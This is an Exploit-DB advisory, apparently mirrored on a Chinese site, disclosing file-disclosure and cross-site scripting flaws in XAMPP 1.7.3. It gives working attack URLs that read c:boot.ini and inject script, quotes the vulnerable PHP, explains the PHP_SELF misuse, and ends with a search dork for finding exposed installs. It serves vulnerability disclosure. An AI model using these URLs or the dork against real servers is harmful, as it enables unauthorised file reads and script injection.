XAMPP 1.7.3 – Multiple Vulnerabilities

  • 作者: TheLeader
    日期: 2010-11-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15370/
  • # _ ___________ 
#(_)____ _ __/ __ \/ /_________/ /_/_/ |
# / // __ \ | / / / / / //_/ _ \/ __// / / /
#/ // / / / |/ / /_/ / ,< /__/ /_/ // / / / 
# /_//_/ /_/|___/\____/_/|_|\___/\__,_// /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
 
I. File disclosure

XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.

http://[host]/xampp/showcode.php/c:boot.ini?showcode=1

showcode.php:
<?php
 echo '<br><br>';
 if ($_REQUEST['showcode'] != 1) {
 echo '<a href="https://www.exploit-db.com/exploits/15370/'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
 } else {
 $file = file_get_contents(basename($_SERVER['PHP_SELF']));
 echo "<h2>".$TEXT['global-sourcecode']."</h2>";
 echo "<textarea cols='100' rows='10'>";
 echo htmlspecialchars($file);
 echo "</textarea>";
 }
?>

showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
basename() parses the last element of that path using "/" as a delimiter.

Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.

II. Cross Site Scripting

http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>

It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
This can be exploited to perform Cross Site Scripting attacks.

biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">

dork: "inurl:xampp/biorhythm.php"
    Python